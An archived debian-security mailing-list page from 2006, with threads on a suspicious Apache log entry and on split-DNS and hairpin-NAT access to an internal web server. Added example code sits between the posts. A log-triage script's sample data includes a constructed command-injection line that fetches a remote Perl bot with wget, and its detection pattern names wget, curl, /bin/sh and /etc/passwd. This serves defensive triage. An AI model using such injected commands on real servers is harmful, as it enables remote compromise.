Re: [SECURITY] [DSA 963-1] New mydns packages fix denial of service

2006-02-01 Thread rasaer-1
Hi,

I am on a business trip abroad from 1 Jan 2006 to 6 Jan 2006 and will be back at work
on 7 Jan 2006.

For urgent work matters please contact Jorma Laajamäki, [EMAIL PROTECTED]
or mobile 0400-585 835.

Regards,

Erno Räsänen



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



RE: Weird message in my apache error log

2006-02-01 Thread Josep Serrano
We have a match. See:

66.232.140.73 - - [31/Jan/2006:07:29:58 +0100] "GET http:///prxjdg.cgi?ja HTTP/1.0" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

where the http address maps to an apparently compromised server where these people
have installed some kind of proxy (proxy judge?).


> I've seen this type of thing with PHP; I was going to say something but I
> figured I would wait since you didn't mention it.  Can you correlate the
> time/date/ip with the request from access.log?  It might give you more
> information.  I can say, that we get attacked regularly on Sarge and we're a
> relatively high volume site with the similar specs, and I've not seen
> anything like this as a standard hack - my experience is that this is most
> often caused by not filtering/validating forms, global PHP variables, or PHP
> scripting errors.  I am very curious to know what's going on.





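Triage logic for the two kinds of request discussed in this thread, as an added example that is not part of any of the posts: it parses Apache "combined" access log lines and flags (a) open-proxy probes, where the request line carries an absolute URI such as the prxjdg.cgi hit above, and (b) attempted command injection through a query string (shell metacharacters, wget/curl), which is what the earlier replies suggested grepping for. The sample lines other than the one quoted above are constructed, and the signature list is a starting point rather than a complete rule set.

```python
"""Triage Apache combined-format access log lines.

Added example for the debian-security thread; not code from the original
posts. Sample lines are constructed except for the prxjdg.cgi probe.
"""
import re
from urllib.parse import unquote

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Absolute URI as request target: the client asks us to fetch a URL on its
# behalf, i.e. it is testing whether the server is an open proxy.
ABSOLUTE_URI_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)

# Shell metacharacters and downloader names that do not belong in a benign
# query string. Assumed starting list; extend it for your own site.
INJECTION_RE = re.compile(
    r'(;|\|\||&&|`|\$\(|\n|\bwget\b|\bcurl\b|/bin/sh|/etc/passwd)',
    re.IGNORECASE,
)

SAMPLE_LOG = [
    # the proxy-judge probe quoted in the thread (absolute URI, empty host)
    '66.232.140.73 - - [31/Jan/2006:07:29:58 +0100] '
    '"GET http:///prxjdg.cgi?ja HTTP/1.0" 404 331 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"',
    # constructed: injection attempt through a CGI parameter
    '10.0.0.5 - - [01/Feb/2006:09:12:01 +0100] '
    '"GET /cgi-bin/form.cgi?var=x;wget%20http://203.0.113.9/bot.pl HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    # constructed: ordinary request
    '10.0.0.6 - - [01/Feb/2006:09:12:02 +0100] '
    '"GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return the named fields of a combined-format line, or None."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(line):
    """Return the list of tags for one log line.

    'unparsed'          - not in combined format
    'malformed_request' - request line without method and target
    'proxy_probe'       - absolute URI as request target
    'cmd_injection'     - decoded query string matches INJECTION_RE
    An empty list means nothing suspicious was found.
    """
    rec = parse_line(line)
    if rec is None:
        return ['unparsed']
    parts = rec['request'].split(' ')
    if len(parts) < 2:
        return ['malformed_request']
    target = parts[1]
    tags = []
    if ABSOLUTE_URI_RE.match(target):
        tags.append('proxy_probe')
    if '?' in target:
        # decode %xx first so "%3B" or "%0a" cannot hide a metacharacter
        query = unquote(target.split('?', 1)[1])
        if INJECTION_RE.search(query):
            tags.append('cmd_injection')
    return tags


def triage(lines):
    """Map each suspicious line to its tags; benign lines are dropped."""
    out = {}
    for line in lines:
        tags = classify(line)
        if tags:
            out[line] = tags
    return out


if __name__ == '__main__':
    for line, tags in triage(SAMPLE_LOG).items():
        print(', '.join(tags), '<-', line)
```

Run it against a real file with `triage(open('/var/log/apache2/access.log'))`; a `proxy_probe` hit with a 404, as in the line above, shows the server refused to act as a forward proxy, while a 200 on such a request is the case to worry about (ProxyRequests should be Off unless you mean to run a proxy).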

Re: getting to www servers from inside where they have an Internal IP

2006-02-01 Thread martin f krafft
thus spoke Yves Junqueira <[EMAIL PROTECTED]> [2006.02.01.1712 +0100]:
> Bind9 implements "views". It can provide different resolutions to
> the same domain for different networks/hosts. "bind9 view" is the
> way to go, I guess.

most nameservers do, but yes, this is what I meant. This, or
a second nameserver.

-- 
Please do not send copies of list mail to me; I read the list!
 
 .''`. martin f. krafft <[EMAIL PROTECTED]>
: :'  :proud Debian developer and author: http://debiansystem.info
`. `'`
  `-  Debian - when you have better things to do than fixing a system
 
Invalid/expired PGP (sub)keys? Use subkeys.pgp.net as keyserver!
 
"the less you know about computers the more you want micro$oft!"
-- micro$oft ad campaign, circa 1996
(proof that micro$oft's advertising _isn't_ dishonest!)




Re: getting to www servers from inside where they have an Internal IP

2006-02-01 Thread Yves Junqueira
2006/1/29, martin f krafft <[EMAIL PROTECTED]>:
> This is hardly a topic for debian-security but anyway...
>
> thus spoke hanasaki <[EMAIL PROTECTED]> [2006.01.29.1945 +0100]:
> > What iptable rule can be put on the firewall so that internal port 80
> > traffic going to the external NIC on port 80 comes back to the internal
> > webserver on port ?
>
> None that I know. I suggest using a second nameserver to resolve the
> A record to the internal IP.
>

Bind9 implements "views". It can provide different resolutions to the
same domain for different networks/hosts. "bind9 view" is the way to
go, I guess.

--
Yves Junqueira
http://www.cetico.org
Brasília, Brasil
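What the "views" suggestion looks like in practice, as an added example that is not from any of the posts: a BIND 9 named.conf fragment that answers www.example.com with the LAN address for LAN clients and with the public address for everyone else. Zone name, addresses and file paths are assumptions (LAN 192.168.2.0/24, web server 192.168.2.2 inside and 203.0.113.10 outside).

```conf
// Added example of BIND 9 split-horizon ("view") configuration.
// Assumed names/addresses: zone example.com, LAN 192.168.2.0/24,
// web server 192.168.2.2 inside and 203.0.113.10 outside.
// Once one view is defined, every zone must live inside a view, and
// views are tried in order: the first match-clients hit wins.

acl "lan" { 192.168.2.0/24; 127.0.0.1; };

view "internal" {
    match-clients { "lan"; };
    recursion yes;            // recursive resolver for the LAN only
    zone "example.com" {
        type master;
        // www IN A 192.168.2.2 in this copy of the zone
        file "/etc/bind/db.example.com.internal";
    };
};

view "external" {
    match-clients { any; };
    recursion no;             // authoritative only; never an open resolver
    zone "example.com" {
        type master;
        // www IN A 203.0.113.10 in this copy; no RFC 1918 addresses here
        file "/etc/bind/db.example.com.external";
    };
};
```

Two checks after reloading: `dig @192.168.2.254 www.example.com` from a LAN host and from outside should return the two different addresses, and the external view must answer `dig @<public-ip> google.com` with a refusal, since an Internet-facing recursive resolver is the classic cache-poisoning and amplification target.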



Re: getting to www servers from inside where they have an Internal IP

2006-02-01 Thread Bernd Eckenfels
martin f krafft <[EMAIL PROTECTED]> wrote:
> None that I know. I suggest using a second nameserver to resolve the
> A record to the internal IP.

"split brain dns"

Regards
Bernd





Re: getting to www servers from inside where they have an Internal IP

2006-02-01 Thread Matt

Michelle Konzack wrote:

> On 2006-01-29 12:45:09, hanasaki wrote:
>
>> The goal is to have an internal webserver:
>> - DONE - running on a high numbered port
>> - DONE - firewall forwards 80-> on webserver
>> - DONE - external hits on www.blah.com
>> served by the httpserver
>> -  - internal/intranet also can hit
>> the webserver as www.blah.com
>>
>> The problem is that www.blah.com resolves to the external internet IP
>> and then gets routed out of the firewall which does not come back in and
>
> This is a problem with DNS-Loop-Back.  Please search google for it.
>
> The solution is, to add an entry for the Webserver to your /etc/hosts.
>
> Greetings
> Michelle Konzack
> Systemadministrator
> Tamay Dogan Network
> Debian GNU/Linux Consultant

If everything is on the same LAN using the same firewall you can do like
this to route the packets correctly:
Note I placed commonly known IPs in here -- not ours -- just so you
have something to ref.


# NAT into individual hosts; firewalled by FORWARD rules defined
# earlier in this configuration (not included in this snippet).
# Both rules belong to the nat table: iptables-restore lines under a
# "*nat" header, or prefix each with "iptables -t nat".

# PREROUTING: -d is the public IP of the web server, --to-destination is
# the private IP of that server. This also catches LAN clients that
# connect to the public IP, as long as their packets pass through this box.
-A PREROUTING -d 128.101.101.101 -j DNAT --to-destination 192.168.2.2

# Fix up NAT from internal hosts ("hairpin NAT"): -s is the LAN subnet,
# -d is the LAN IP of the web server, --to-source is the LAN IP of the
# gateway (firewall). Without it the web server answers the LAN client
# directly, the client never saw the DNAT, and the connection fails.
# Side effect: the web server logs the gateway's address, not the client's.
-A POSTROUTING -s 192.168.2.0/24 -d 192.168.2.2/32 -p tcp -m tcp --dport 80 -j SNAT --to-source 192.168.2.254


Hope this helps!
Matt





RE: Weird message in my apache error log

2006-02-01 Thread David Johnson
I've seen this type of thing with PHP; I was going to say something but I
figured I would wait since you didn't mention it.  Can you correlate the
time/date/ip with the request from access.log?  It might give you more
information.  I can say, that we get attacked regularly on Sarge and we're a
relatively high volume site with the similar specs, and I've not seen
anything like this as a standard hack - my experience is that this is most
often caused by not filtering/validating forms, global PHP variables, or PHP
scripting errors.  I am very curious to know what's going on.




> -Original Message-
> From: Josep Serrano [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, February 01, 2006 4:53 AM
> To: debian-security@lists.debian.org
> Subject: RE: Weird message in my apache error log
> 
> Hello guys,
> 
> No, I can't think of any specific application. Yes this web server is
> running a
> couple of php scripts but that's it.
> 
> Following your recommendations I have installed mod_security with the set
> of
> standard rules provided in www.modsecurity.org. I will be following up the
> audit log
> for any clues.
> 
> Be sure that I have strange files, permissions, or open ports in this box.
> I run
> daily checks and I got the vaccines :-)
> 
> Thanks,
> Josep SERRANO.
> 
> > What does your application do? It looks like it is finding a shell
> script
> > somewhere?  We've seen similar things when executing CGI's and not
> filtering
> > the input data so well.  The line 22, 24 make me think there is a script
> > somewhere rather than arbitrary GET data.
> >
> >> -Original Message-
> >> Looks like someone is trying to do arbitrary command execution. You
> >> probably have a script somewhere that says `command $_GET['var']`, and
> >> someone is passing ';attack' as var, but it isn't quite working.
> >>
> >> I suggest using the audit log feature of mod_security, or just grepping
> >> through your access logs for anything odd ('wget' is a good search
> >> term).
> >>
> >> You might have a bot on the system, check for any odd network
> >> connections, especially to port 6667 (IRC). Also look for www-data
> owned
> >> files in /tmp.
> 
> 
> 






Re: getting to www servers from inside where they have an Internal IP

2006-02-01 Thread Michelle Konzack
On 2006-01-29 12:45:09, hanasaki wrote:
> The goal is to have an internal webserver:
>   - DONE - running on a high numbered port
>   - DONE - firewall forwards 80-> on webserver
>   - DONE - external hits on www.blah.com
>   served by the httpserver
>   -  - internal/intranet also can hit
>   the webserver as www.blah.com
> 
> The problem is that www.blah.com resolves to the external internet IP
> and then gets routed out of the firewall which does not come back in and

This is a problem with DNS-Loop-Back.  Please search google for it.

The solution is, to add an entry for the Webserver to your /etc/hosts.

Greetings
Michelle Konzack
Systemadministrator
Tamay Dogan Network
Debian GNU/Linux Consultant


-- 
Linux-User #280138 with the Linux Counter, http://counter.li.org/
# Debian GNU/Linux Consultant #
Michelle Konzack   Apt. 917  ICQ #328449886
   50, rue de Soultz MSM LinuxMichi
0033/3/8845235667100 Strasbourg/France   IRC #Debian (irc.icq.com)





RE: Weird message in my apache error log

2006-02-01 Thread Josep Serrano
Hello guys,

No, I can't think of any specific application. Yes this web server is running a
couple of php scripts but that's it.

Following your recommendations I have installed mod_security with the set of
standard rules provided in www.modsecurity.org. I will be following up the 
audit log
for any clues.

Be sure that I have strange files, permissions, or open ports in this box. I run
daily checks and I got the vaccines :-)

Thanks,
Josep SERRANO.

> What does your application do? It looks like it is finding a shell script
> somewhere?  We've seen similar things when executing CGI's and not filtering
> the input data so well.  The line 22, 24 make me think there is a script
> somewhere rather than arbitrary GET data.
>
>> -Original Message-
>> Looks like someone is trying to do arbitrary command execution. You
>> probably have a script somewhere that says `command $_GET['var']`, and
>> someone is passing ';attack' as var, but it isn't quite working.
>>
>> I suggest using the audit log feature of mod_security, or just grepping
>> through your access logs for anything odd ('wget' is a good search
>> term).
>>
>> You might have a bot on the system, check for any odd network
>> connections, especially to port 6667 (IRC). Also look for www-data owned
>> files in /tmp.


